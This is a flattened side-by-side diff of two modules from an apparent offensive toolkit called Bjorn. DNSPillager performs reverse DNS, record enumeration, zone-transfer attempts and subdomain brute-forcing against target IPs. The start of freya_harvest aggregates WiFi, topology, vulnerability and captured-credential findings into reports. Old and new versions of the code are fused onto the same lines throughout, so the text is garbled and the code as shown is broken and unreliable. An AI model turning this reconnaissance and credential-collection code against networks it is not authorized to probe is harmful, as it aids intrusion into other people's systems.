self.domain = domain DNS reconnaissance action for the Bjorn orchestrator.
self.wordlist = wordlist Performs reverse DNS, record enumeration, zone transfer attempts,
self.output_dir = output_dir and subdomain brute-force discovery.
self.threads = threads """
self.recursive = recursive
self.discovered_domains = set()
self.lock = threading.Lock()
self.resolver = dns.resolver.Resolver()
self.resolver.timeout = 1
self.resolver.lifetime = 1
def save_results(self, results): def __init__(self, shared_data: SharedData):
"""Save enumeration results to a JSON file.""" self.shared_data = shared_data
# IP -> (MAC, hostname) identity cache from DB
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
# DNS resolver setup (dnspython)
self._resolver = None
if _HAS_DNSPYTHON:
self._resolver = dns.resolver.Resolver()
self._resolver.timeout = 3
self._resolver.lifetime = 5
# Ensure output directory exists
try: try:
os.makedirs(self.output_dir, exist_ok=True) os.makedirs(OUTPUT_DIR, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
filename = os.path.join(self.output_dir, f"dns_enum_{timestamp}.json")
with open(filename, 'w') as f:
json.dump(results, f, indent=4)
logging.info(f"Results saved to {filename}")
except Exception as e: except Exception as e:
logging.error(f"Failed to save results: {e}") logger.error(f"Failed to create output directory {OUTPUT_DIR}: {e}")
def query_domain(self, domain, record_type): # Thread safety
"""Query a domain for specific DNS record type.""" self._lock = threading.Lock()
logger.info("DNSPillager initialized (dnspython=%s)", _HAS_DNSPYTHON)
# --------------------- Identity cache (hosts) ---------------------
def _refresh_ip_identity_cache(self) -> None:
"""Rebuild IP -> (MAC, current_hostname) from DB.hosts."""
self._ip_to_identity.clear()
try: try:
answers = self.resolver.resolve(domain, record_type) rows = self.shared_data.db.get_all_hosts()
return [str(answer) for answer in answers] except Exception as e:
except: logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip_addr in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip_addr] = (mac, current_hn)
def _mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def _hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# --------------------- Public API (Orchestrator) ---------------------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
"""
Execute DNS reconnaissance on the given target.
Args:
ip: Target IP address
port: Target port (typically 53)
row: Row dict from orchestrator (contains MAC, hostname, etc.)
status_key: Status tracking key
Returns:
'success' | 'failed' | 'interrupted'
"""
self.shared_data.bjorn_orch_status = "DNSPillager"
self.shared_data.bjorn_progress = "0%"
self.shared_data.comment_params = {"ip": ip, "port": str(port), "phase": "init"}
results = {
"target_ip": ip,
"port": str(port),
"timestamp": datetime.datetime.now().isoformat(),
"reverse_dns": None,
"domain": None,
"records": {},
"zone_transfer": {},
"subdomains": [],
"errors": [],
}
try:
# --- Check for early exit ---
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal before start.")
return "interrupted"
mac = row.get("MAC Address") or row.get("mac_address") or self._mac_for_ip(ip) or ""
hostname = (
row.get("Hostname") or row.get("hostname")
or self._hostname_for_ip(ip)
or ""
)
# =========================================================
# Phase 1: Reverse DNS lookup (0% -> 10%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "reverse_dns"}
logger.info(f"[{ip}] Phase 1: Reverse DNS lookup")
reverse_hostname = self._reverse_dns(ip)
if reverse_hostname:
results["reverse_dns"] = reverse_hostname
logger.info(f"[{ip}] Reverse DNS: {reverse_hostname}")
self.shared_data.log_milestone(b_class, "ReverseDNS", f"IP: {ip} -> {reverse_hostname}")
# Update hostname if we found something new
if not hostname or hostname == ip:
hostname = reverse_hostname
else:
logger.info(f"[{ip}] No reverse DNS result.")
self.shared_data.bjorn_progress = "10%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 2: Extract domain and enumerate DNS records (10% -> 35%)
# =========================================================
domain = self._extract_domain(hostname)
results["domain"] = domain
if domain:
self.shared_data.comment_params = {"ip": ip, "phase": "records", "domain": domain}
logger.info(f"[{ip}] Phase 2: DNS record enumeration for {domain}")
self.shared_data.log_milestone(b_class, "EnumerateRecords", f"Domain: {domain}")
record_results = {}
total_types = len(DNS_RECORD_TYPES)
for idx, rtype in enumerate(DNS_RECORD_TYPES):
if self.shared_data.orchestrator_should_exit:
return "interrupted"
records = self._query_records(domain, rtype)
if records:
record_results[rtype] = records
logger.info(f"[{ip}] {rtype} records for {domain}: {records}")
# Progress: 10% -> 35% across record types
pct = 10 + int((idx + 1) / total_types * 25)
self.shared_data.bjorn_progress = f"{pct}%"
results["records"] = record_results
else:
logger.warning(f"[{ip}] No domain could be extracted. Skipping record enumeration.")
self.shared_data.bjorn_progress = "35%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 3: Zone transfer (AXFR) attempt (35% -> 45%)
# =========================================================
self.shared_data.bjorn_progress = "35%"
self.shared_data.comment_params = {"ip": ip, "phase": "zone_transfer", "domain": domain or ip}
if domain and _HAS_DNSPYTHON:
logger.info(f"[{ip}] Phase 3: Zone transfer attempt for {domain}")
nameservers = results["records"].get("NS", [])
# Also try the target IP itself as a nameserver
ns_targets = list(set(nameservers + [ip]))
zone_results = {}
for ns_idx, ns in enumerate(ns_targets):
if self.shared_data.orchestrator_should_exit:
return "interrupted"
axfr_records = self._attempt_zone_transfer(domain, ns)
if axfr_records:
zone_results[ns] = axfr_records
logger.success(f"[{ip}] Zone transfer SUCCESS from {ns}: {len(axfr_records)} records")
self.shared_data.log_milestone(b_class, "AXFRSuccess", f"NS: {ns} | Records: {len(axfr_records)}")
# Progress within 35% -> 45%
if ns_targets:
pct = 35 + int((ns_idx + 1) / len(ns_targets) * 10)
self.shared_data.bjorn_progress = f"{pct}%"
results["zone_transfer"] = zone_results
else:
if not _HAS_DNSPYTHON:
results["errors"].append("Zone transfer skipped: dnspython not available")
elif not domain:
results["errors"].append("Zone transfer skipped: no domain found")
logger.info(f"[{ip}] Skipping zone transfer (dnspython={_HAS_DNSPYTHON}, domain={domain})")
self.shared_data.bjorn_progress = "45%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 4: Subdomain brute-force (45% -> 95%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "subdomains", "domain": domain or ip}
if domain:
logger.info(f"[{ip}] Phase 4: Subdomain brute-force for {domain}")
self.shared_data.log_milestone(b_class, "SubdomainEnum", f"Domain: {domain}")
wordlist = self._load_wordlist()
thread_count = min(10, max(1, len(wordlist)))
discovered = self._enumerate_subdomains(domain, wordlist, thread_count)
results["subdomains"] = discovered
logger.info(f"[{ip}] Subdomain enumeration found {len(discovered)} live subdomains")
else:
logger.info(f"[{ip}] Skipping subdomain enumeration: no domain available")
results["errors"].append("Subdomain enumeration skipped: no domain found")
self.shared_data.bjorn_progress = "95%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 5: Save results and update DB (95% -> 100%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "saving"}
logger.info(f"[{ip}] Phase 5: Saving results")
# Save JSON output
self._save_results(ip, results)
# Update DB hostname if reverse DNS discovered new data
if reverse_hostname and mac:
self._update_db_hostname(mac, ip, reverse_hostname)
self.shared_data.bjorn_progress = "100%"
self.shared_data.log_milestone(b_class, "Complete", f"Records: {sum(len(v) for v in results['records'].values())} | Subdomains: {len(results['subdomains'])}")
# Summary comment
record_count = sum(len(v) for v in results["records"].values())
zone_count = sum(len(v) for v in results["zone_transfer"].values())
sub_count = len(results["subdomains"])
self.shared_data.comment_params = {
"ip": ip,
"domain": domain or "N/A",
"records": str(record_count),
"zones": str(zone_count),
"subdomains": str(sub_count),
}
logger.success(
f"[{ip}] DNS Pillager complete: domain={domain}, "
f"records={record_count}, zone_transfers={zone_count}, subdomains={sub_count}"
)
return "success"
except Exception as e:
logger.error(f"[{ip}] DNSPillager execute failed: {e}")
results["errors"].append(str(e))
# Still try to save partial results
try:
self._save_results(ip, results)
except Exception:
pass
return "failed"
finally:
self.shared_data.bjorn_progress = ""
# --------------------- Reverse DNS ---------------------
def _reverse_dns(self, ip: str) -> Optional[str]:
"""Perform reverse DNS lookup on the IP address."""
# Try dnspython first
if _HAS_DNSPYTHON and self._resolver:
try:
rev_name = dns.reversename.from_address(ip)
answers = self._resolver.resolve(rev_name, "PTR")
for rdata in answers:
hostname = str(rdata).rstrip(".")
if hostname:
return hostname
except Exception as e:
logger.debug(f"dnspython reverse DNS failed for {ip}: {e}")
# Socket fallback
try:
hostname, _, _ = socket.gethostbyaddr(ip)
if hostname and hostname != ip:
return hostname
except (socket.herror, socket.gaierror, OSError) as e:
logger.debug(f"Socket reverse DNS failed for {ip}: {e}")
return None
# --------------------- Domain extraction ---------------------
@staticmethod
def _extract_domain(hostname: str) -> Optional[str]:
"""
Extract the registerable domain from a hostname.
e.g., 'mail.sub.example.com' -> 'example.com'
'host1.internal.lan' -> 'internal.lan'
'192.168.1.1' -> None
"""
if not hostname:
return None
# Skip raw IPs
hostname = hostname.strip().rstrip(".")
parts = hostname.split(".")
if len(parts) < 2:
return None
# Check if it looks like an IP address
try:
socket.inet_aton(hostname)
return None # It's an IP, not a hostname
except (socket.error, OSError):
pass
# For simple TLDs, take the last 2 parts
# For compound TLDs (co.uk, com.au), take the last 3 parts
compound_tlds = {
"co.uk", "co.jp", "co.kr", "co.nz", "co.za", "co.in",
"com.au", "com.br", "com.cn", "com.mx", "com.tw",
"org.uk", "net.au", "ac.uk", "gov.uk",
}
if len(parts) >= 3:
possible_compound = f"{parts[-2]}.{parts[-1]}"
if possible_compound.lower() in compound_tlds:
return ".".join(parts[-3:])
return ".".join(parts[-2:])
# --------------------- DNS record queries ---------------------
def _query_records(self, domain: str, record_type: str) -> List[str]:
"""Query DNS records of a given type for a domain."""
records = []
# Try dnspython first
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(domain, record_type)
for rdata in answers:
value = str(rdata).rstrip(".")
if value:
records.append(value)
return records
except dns.resolver.NXDOMAIN:
logger.debug(f"NXDOMAIN for {domain} {record_type}")
except dns.resolver.NoAnswer:
logger.debug(f"No answer for {domain} {record_type}")
except dns.resolver.NoNameservers:
logger.debug(f"No nameservers for {domain} {record_type}")
except dns.exception.Timeout:
logger.debug(f"Timeout querying {domain} {record_type}")
except Exception as e:
logger.debug(f"dnspython query failed for {domain} {record_type}: {e}")
# Socket fallback (limited to A records only)
if record_type == "A" and not records:
try:
ips = socket.getaddrinfo(domain, None, socket.AF_INET, socket.SOCK_STREAM)
for info in ips:
addr = info[4][0]
if addr and addr not in records:
records.append(addr)
except (socket.gaierror, OSError) as e:
logger.debug(f"Socket fallback failed for {domain} A: {e}")
# Socket fallback for AAAA
if record_type == "AAAA" and not records:
try:
ips = socket.getaddrinfo(domain, None, socket.AF_INET6, socket.SOCK_STREAM)
for info in ips:
addr = info[4][0]
if addr and addr not in records:
records.append(addr)
except (socket.gaierror, OSError) as e:
logger.debug(f"Socket fallback failed for {domain} AAAA: {e}")
return records
# --------------------- Zone transfer (AXFR) ---------------------
def _attempt_zone_transfer(self, domain: str, nameserver: str) -> List[Dict]:
"""
Attempt an AXFR zone transfer from a nameserver.
Returns a list of record dicts on success, empty list on failure.
"""
if not _HAS_DNSPYTHON:
return [] return []
def enumerate_domain(self, subdomain): records = []
"""Enumerate a single subdomain for all record types.""" # Resolve NS hostname to IP if needed
full_domain = f"{subdomain}.{self.domain}" if subdomain else self.domain ns_ip = self._resolve_ns_to_ip(nameserver)
results = {'domain': full_domain, 'records': {}} if not ns_ip:
logger.debug(f"Cannot resolve NS {nameserver} to IP, skipping AXFR")
return []
for record_type in DEFAULT_RECORD_TYPES:
records = self.query_domain(full_domain, record_type)
if records:
results['records'][record_type] = records
with self.lock:
self.discovered_domains.add(full_domain)
logging.info(f"Found {record_type} records for {full_domain}")
return results if results['records'] else None
def load_wordlist(self):
"""Load subdomain wordlist or use built-in list."""
if self.wordlist and os.path.exists(self.wordlist):
with open(self.wordlist, 'r') as f:
return [line.strip() for line in f if line.strip()]
return ['www', 'mail', 'remote', 'blog', 'webmail', 'server', 'ns1', 'ns2', 'smtp', 'secure']
def execute(self):
"""Execute the DNS enumeration process."""
results = {'timestamp': datetime.now().isoformat(), 'findings': []}
subdomains = self.load_wordlist()
logging.info(f"Starting DNS enumeration for {self.domain}")
with ThreadPoolExecutor(max_workers=self.threads) as executor:
enum_results = list(filter(None, executor.map(self.enumerate_domain, subdomains)))
results['findings'].extend(enum_results)
if self.recursive and self.discovered_domains:
logging.info("Starting recursive enumeration")
new_domains = set()
for domain in self.discovered_domains:
if domain != self.domain:
new_subdomains = [d.split('.')[0] for d in domain.split('.')[:-2]]
new_domains.update(new_subdomains)
if new_domains:
enum_results = list(filter(None, executor.map(self.enumerate_domain, new_domains)))
results['findings'].extend(enum_results)
self.save_results(results)
return results
def save_settings(domain, wordlist, output_dir, threads, recursive):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"domain": domain,
"wordlist": wordlist,
"output_dir": output_dir,
"threads": threads,
"recursive": recursive
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try: try:
with open(SETTINGS_FILE, 'r') as f: zone = dns.zone.from_xfr(
return json.load(f) dns.query.xfr(ns_ip, domain, timeout=10, lifetime=30)
)
for name, node in zone.nodes.items():
for rdataset in node.rdatasets:
for rdata in rdataset:
records.append({
"name": str(name),
"type": dns.rdatatype.to_text(rdataset.rdtype),
"ttl": rdataset.ttl,
"value": str(rdata),
})
except dns.exception.FormError:
logger.debug(f"AXFR refused by {nameserver} ({ns_ip}) for {domain}")
except dns.exception.Timeout:
logger.debug(f"AXFR timeout from {nameserver} ({ns_ip}) for {domain}")
except ConnectionError as e:
logger.debug(f"AXFR connection error from {nameserver}: {e}")
except OSError as e:
logger.debug(f"AXFR OS error from {nameserver}: {e}")
except Exception as e: except Exception as e:
logging.error(f"Failed to load settings: {e}") logger.debug(f"AXFR failed from {nameserver} ({ns_ip}) for {domain}: {e}")
return {}
def main(): return records
parser = argparse.ArgumentParser(description="DNS Pillager for domain reconnaissance")
parser.add_argument("-d", "--domain", help="Target domain for enumeration")
parser.add_argument("-w", "--wordlist", help="Path to subdomain wordlist")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory for results")
parser.add_argument("-t", "--threads", type=int, default=10, help="Number of threads")
parser.add_argument("-r", "--recursive", action="store_true", help="Enable recursive enumeration")
args = parser.parse_args()
settings = load_settings() def _resolve_ns_to_ip(self, nameserver: str) -> Optional[str]:
domain = args.domain or settings.get("domain") """Resolve a nameserver hostname to an IP address."""
wordlist = args.wordlist or settings.get("wordlist") ns = nameserver.strip().rstrip(".")
output_dir = args.output or settings.get("output_dir")
threads = args.threads or settings.get("threads")
recursive = args.recursive or settings.get("recursive")
if not domain: # Check if already an IP
logging.error("Domain is required. Use -d or save it in settings") try:
return socket.inet_aton(ns)
return ns
except (socket.error, OSError):
pass
save_settings(domain, wordlist, output_dir, threads, recursive) # Try to resolve
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(ns, "A")
for rdata in answers:
return str(rdata)
except Exception:
pass
pillager = DNSPillager( # Socket fallback
domain=domain, try:
wordlist=wordlist, result = socket.getaddrinfo(ns, 53, socket.AF_INET, socket.SOCK_STREAM)
output_dir=output_dir, if result:
threads=threads, return result[0][4][0]
recursive=recursive except Exception:
) pass
pillager.execute()
return None
# --------------------- Subdomain enumeration ---------------------
def _load_wordlist(self) -> List[str]:
"""Load subdomain wordlist from file or use built-in list."""
# Check for configured wordlist path
wordlist_path = ""
if hasattr(self.shared_data, "config") and self.shared_data.config:
wordlist_path = self.shared_data.config.get("dns_wordlist", "")
if wordlist_path and os.path.isfile(wordlist_path):
try:
with open(wordlist_path, "r", encoding="utf-8", errors="ignore") as f:
words = [line.strip() for line in f if line.strip() and not line.startswith("#")]
if words:
logger.info(f"Loaded {len(words)} subdomains from {wordlist_path}")
return words
except Exception as e:
logger.error(f"Failed to load wordlist {wordlist_path}: {e}")
logger.info(f"Using built-in subdomain wordlist ({len(BUILTIN_SUBDOMAINS)} entries)")
return list(BUILTIN_SUBDOMAINS)
def _enumerate_subdomains(
self, domain: str, wordlist: List[str], thread_count: int
) -> List[Dict]:
"""
Brute-force subdomain enumeration using ThreadPoolExecutor.
Returns a list of discovered subdomain dicts.
"""
discovered: List[Dict] = []
total = len(wordlist)
if total == 0:
return discovered
completed = [0] # mutable counter for thread-safe progress
def check_subdomain(sub: str) -> Optional[Dict]:
"""Check if a subdomain resolves."""
if self.shared_data.orchestrator_should_exit:
return None
fqdn = f"{sub}.{domain}"
result = None
# Try dnspython
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(fqdn, "A")
ips = [str(rdata) for rdata in answers]
if ips:
result = {
"subdomain": sub,
"fqdn": fqdn,
"ips": ips,
"method": "dns",
}
except Exception:
pass
# Socket fallback
if result is None:
try:
addr_info = socket.getaddrinfo(fqdn, None, socket.AF_INET, socket.SOCK_STREAM)
ips = list(set(info[4][0] for info in addr_info))
if ips:
result = {
"subdomain": sub,
"fqdn": fqdn,
"ips": ips,
"method": "socket",
}
except (socket.gaierror, OSError):
pass
# Update progress atomically
with self._lock:
completed[0] += 1
# Progress: 45% -> 95% across subdomain enumeration
pct = 45 + int((completed[0] / total) * 50)
pct = min(pct, 95)
self.shared_data.bjorn_progress = f"{pct}%"
return result
try:
with ThreadPoolExecutor(max_workers=thread_count) as executor:
futures = {
executor.submit(check_subdomain, sub): sub for sub in wordlist
}
for future in as_completed(futures):
if self.shared_data.orchestrator_should_exit:
# Cancel remaining futures
for f in futures:
f.cancel()
logger.info("Subdomain enumeration interrupted by orchestrator.")
break
try:
result = future.result(timeout=15)
if result:
with self._lock:
discovered.append(result)
logger.info(
f"Subdomain found: {result['fqdn']} -> {result['ips']}"
)
self.shared_data.comment_params = {
"ip": domain,
"phase": "subdomains",
"found": str(len(discovered)),
"last": result["fqdn"],
}
except Exception as e:
logger.debug(f"Subdomain future error: {e}")
except Exception as e:
logger.error(f"Subdomain enumeration thread pool error: {e}")
return discovered
# --------------------- Result saving ---------------------
def _save_results(self, ip: str, results: Dict) -> None:
"""Save DNS reconnaissance results to a JSON file."""
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
safe_ip = ip.replace(":", "_").replace(".", "_")
timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
filename = f"dns_{safe_ip}_{timestamp}.json"
filepath = os.path.join(OUTPUT_DIR, filename)
with open(filepath, "w", encoding="utf-8") as f:
json.dump(results, f, indent=2, default=str)
logger.info(f"Results saved to {filepath}")
except Exception as e:
logger.error(f"Failed to save results for {ip}: {e}")
# --------------------- DB hostname update ---------------------
def _update_db_hostname(self, mac: str, ip: str, new_hostname: str) -> None:
"""Update the hostname in the hosts DB table if we found new DNS data."""
if not mac or not new_hostname:
return
try:
rows = self.shared_data.db.query(
"SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if not rows:
return
existing = rows[0].get("hostnames") or ""
existing_set = set(h.strip() for h in existing.split(";") if h.strip())
if new_hostname not in existing_set:
existing_set.add(new_hostname)
updated = ";".join(sorted(existing_set))
self.shared_data.db.execute(
"UPDATE hosts SET hostnames=? WHERE mac_address=?",
(updated, mac),
)
logger.info(f"Updated DB hostname for MAC {mac}: added {new_hostname}")
# Refresh our local cache
self._refresh_ip_identity_cache()
except Exception as e:
logger.error(f"Failed to update DB hostname for MAC {mac}: {e}")
# ---------------------------------------------------------------------------
# CLI mode (debug / manual execution)
# ---------------------------------------------------------------------------
if __name__ == "__main__": if __name__ == "__main__":
main() shared_data = SharedData()
try:
pillager = DNSPillager(shared_data)
logger.info("DNS Pillager module ready (CLI mode).")
rows = shared_data.read_data()
for row in rows:
ip = row.get("IPs") or row.get("ip")
if not ip:
continue
port = row.get("port") or 53
logger.info(f"Execute DNSPillager on {ip}:{port} ...")
status = pillager.execute(ip, str(port), row, "dns_pillager")
if status == "success":
logger.success(f"DNS recon successful for {ip}:{port}.")
elif status == "interrupted":
logger.warning(f"DNS recon interrupted for {ip}:{port}.")
break
else:
logger.failed(f"DNS recon failed for {ip}:{port}.")
logger.info("DNS Pillager CLI execution completed.")
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -1,457 +1,165 @@
# Data collection and organization tool to aggregate findings from other modules. #!/usr/bin/env python3
# Saves settings in `/home/bjorn/.settings_bjorn/freya_harvest_settings.json`. # -*- coding: utf-8 -*-
# Automatically loads saved settings if arguments are not provided. """
# -i, --input Input directory to monitor (default: /home/bjorn/Bjorn/data/output/). freya_harvest.py -- Data collection and intelligence aggregation for BJORN.
# -o, --output Output directory for reports (default: /home/bjorn/Bjorn/data/reports). Monitors output directories and generates consolidated reports.
# -f, --format Output format (json, html, md, default: all). """
# -w, --watch Watch for new findings in real-time.
# -c, --clean Clean old data before processing.
import os import os
import json import json
import argparse
from datetime import datetime
import logging
import time
import shutil
import glob import glob
import watchdog.observers import threading
import watchdog.events import time
import markdown from datetime import datetime
import jinja2
from collections import defaultdict from collections import defaultdict
from typing import Any, Dict, List, Optional
from logger import Logger
logger = Logger(name="freya_harvest.py")
# -------------------- Action metadata --------------------
b_class = "FreyaHarvest" b_class = "FreyaHarvest"
b_module = "freya_harvest" b_module = "freya_harvest"
b_enabled = 0 b_status = "freya_harvest"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "normal"
b_priority = 50
b_cooldown = 0
b_rate_limit = None
b_timeout = 1800
b_max_retries = 1
b_stealth_level = 10 # Local file processing is stealthy
b_risk_level = "low"
b_enabled = 1
b_tags = ["harvest", "report", "aggregator", "intel"]
b_category = "recon"
b_name = "Freya Harvest"
b_description = "Aggregates findings from all modules into consolidated intelligence reports."
b_author = "Bjorn Team"
b_version = "2.0.4"
b_icon = "FreyaHarvest.png"
# Configure logging b_args = {
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s') "input_dir": {
"type": "text",
# Default settings "label": "Input Data Dir",
DEFAULT_INPUT_DIR = "/home/bjorn/Bjorn/data/output" "default": "/home/bjorn/Bjorn/data/output"
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/reports" },
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn" "output_dir": {
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "freya_harvest_settings.json") "type": "text",
"label": "Reports Dir",
# HTML template for reports "default": "/home/bjorn/Bjorn/data/reports"
HTML_TEMPLATE = """ },
<!DOCTYPE html> "watch": {
<html> "type": "checkbox",
<head> "label": "Continuous Watch",
<title>Bjorn Reconnaissance Report</title> "default": True
<style> },
body { font-family: Arial, sans-serif; margin: 20px; } "format": {
.section { margin: 20px 0; padding: 10px; border: 1px solid #ddd; } "type": "select",
.vuln-high { background-color: #ffebee; } "label": "Report Format",
.vuln-medium { background-color: #fff3e0; } "choices": ["json", "md", "all"],
.vuln-low { background-color: #f1f8e9; } "default": "all"
table { border-collapse: collapse; width: 100%; margin-bottom: 20px; } }
th, td { border: 1px solid #ddd; padding: 8px; text-align: left; } }
th { background-color: #f5f5f5; }
h1, h2, h3 { color: #333; }
.metadata { color: #666; font-style: italic; }
.timestamp { font-weight: bold; }
</style>
</head>
<body>
<h1>Bjorn Reconnaissance Report</h1>
<div class="metadata">
<p class="timestamp">Generated: {{ timestamp }}</p>
</div>
{% for section in sections %}
<div class="section">
<h2>{{ section.title }}</h2>
{{ section.content }}
</div>
{% endfor %}
</body>
</html>
"""
class FreyaHarvest: class FreyaHarvest:
def __init__(self, input_dir=DEFAULT_INPUT_DIR, output_dir=DEFAULT_OUTPUT_DIR, def __init__(self, shared_data):
formats=None, watch_mode=False, clean=False): self.shared_data = shared_data
self.input_dir = input_dir
self.output_dir = output_dir
self.formats = formats or ['json', 'html', 'md']
self.watch_mode = watch_mode
self.clean = clean
self.data = defaultdict(list) self.data = defaultdict(list)
self.observer = None self.lock = threading.Lock()
self.last_scan_time = 0
def clean_directories(self): def _collect_data(self, input_dir):
"""Clean output directory if requested.""" """Scan directories for JSON findings."""
if self.clean and os.path.exists(self.output_dir): categories = ['wifi', 'topology', 'webscan', 'packets', 'hashes']
shutil.rmtree(self.output_dir) new_findings = 0
os.makedirs(self.output_dir)
logging.info(f"Cleaned output directory: {self.output_dir}")
def collect_wifi_data(self):
"""Collect WiFi-related findings."""
try:
wifi_dir = os.path.join(self.input_dir, "wifi")
if os.path.exists(wifi_dir):
for file in glob.glob(os.path.join(wifi_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['wifi'].append(data)
except Exception as e:
logging.error(f"Error collecting WiFi data: {e}")
def collect_network_data(self):
"""Collect network topology and host findings."""
try:
network_dir = os.path.join(self.input_dir, "topology")
if os.path.exists(network_dir):
for file in glob.glob(os.path.join(network_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['network'].append(data)
except Exception as e:
logging.error(f"Error collecting network data: {e}")
def collect_vulnerability_data(self):
"""Collect vulnerability findings."""
try:
vuln_dir = os.path.join(self.input_dir, "webscan")
if os.path.exists(vuln_dir):
for file in glob.glob(os.path.join(vuln_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['vulnerabilities'].append(data)
except Exception as e:
logging.error(f"Error collecting vulnerability data: {e}")
def collect_credential_data(self):
"""Collect credential findings."""
try:
cred_dir = os.path.join(self.input_dir, "packets")
if os.path.exists(cred_dir):
for file in glob.glob(os.path.join(cred_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['credentials'].append(data)
except Exception as e:
logging.error(f"Error collecting credential data: {e}")
def collect_data(self):
"""Collect all data from various sources."""
self.data.clear() # Reset data before collecting
self.collect_wifi_data()
self.collect_network_data()
self.collect_vulnerability_data()
self.collect_credential_data()
logging.info("Data collection completed")
def generate_json_report(self):
"""Generate JSON format report."""
try:
report = {
'timestamp': datetime.now().isoformat(),
'findings': dict(self.data)
}
os.makedirs(self.output_dir, exist_ok=True)
output_file = os.path.join(self.output_dir,
f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.json")
with open(output_file, 'w') as f:
json.dump(report, f, indent=4)
logging.info(f"JSON report saved to {output_file}")
except Exception as e:
logging.error(f"Error generating JSON report: {e}")
def generate_html_report(self):
"""Generate HTML format report."""
try:
template = jinja2.Template(HTML_TEMPLATE)
sections = []
# Network Section
if self.data['network']:
content = "<h3>Network Topology</h3>"
for topology in self.data['network']:
content += f"<p>Hosts discovered: {len(topology.get('hosts', []))}</p>"
content += "<table><tr><th>IP</th><th>MAC</th><th>Open Ports</th><th>Status</th></tr>"
for ip, data in topology.get('hosts', {}).items():
ports = data.get('ports', [])
mac = data.get('mac', 'Unknown')
status = data.get('status', 'Unknown')
content += f"<tr><td>{ip}</td><td>{mac}</td><td>{', '.join(map(str, ports))}</td><td>{status}</td></tr>"
content += "</table>"
sections.append({"title": "Network Information", "content": content})
# WiFi Section
if self.data['wifi']:
content = "<h3>WiFi Findings</h3>"
for wifi_data in self.data['wifi']:
content += "<table><tr><th>SSID</th><th>BSSID</th><th>Security</th><th>Signal</th><th>Channel</th></tr>"
for network in wifi_data.get('networks', []):
content += f"<tr><td>{network.get('ssid', 'Unknown')}</td>"
content += f"<td>{network.get('bssid', 'Unknown')}</td>"
content += f"<td>{network.get('security', 'Unknown')}</td>"
content += f"<td>{network.get('signal_strength', 'Unknown')}</td>"
content += f"<td>{network.get('channel', 'Unknown')}</td></tr>"
content += "</table>"
sections.append({"title": "WiFi Networks", "content": content})
# Vulnerabilities Section
if self.data['vulnerabilities']:
content = "<h3>Discovered Vulnerabilities</h3>"
for vuln_data in self.data['vulnerabilities']:
content += "<table><tr><th>Type</th><th>Severity</th><th>Target</th><th>Description</th><th>Recommendation</th></tr>"
for vuln in vuln_data.get('findings', []):
severity_class = f"vuln-{vuln.get('severity', 'low').lower()}"
content += f"<tr class='{severity_class}'>"
content += f"<td>{vuln.get('type', 'Unknown')}</td>"
content += f"<td>{vuln.get('severity', 'Unknown')}</td>"
content += f"<td>{vuln.get('target', 'Unknown')}</td>"
content += f"<td>{vuln.get('description', 'No description')}</td>"
content += f"<td>{vuln.get('recommendation', 'No recommendation')}</td></tr>"
content += "</table>"
sections.append({"title": "Vulnerabilities", "content": content})
# Credentials Section
if self.data['credentials']:
content = "<h3>Discovered Credentials</h3>"
content += "<table><tr><th>Type</th><th>Source</th><th>Service</th><th>Username</th><th>Timestamp</th></tr>"
for cred_data in self.data['credentials']:
for cred in cred_data.get('credentials', []):
content += f"<tr><td>{cred.get('type', 'Unknown')}</td>"
content += f"<td>{cred.get('source', 'Unknown')}</td>"
content += f"<td>{cred.get('service', 'Unknown')}</td>"
content += f"<td>{cred.get('username', 'Unknown')}</td>"
content += f"<td>{cred.get('timestamp', 'Unknown')}</td></tr>"
content += "</table>"
sections.append({"title": "Credentials", "content": content})
# Generate HTML
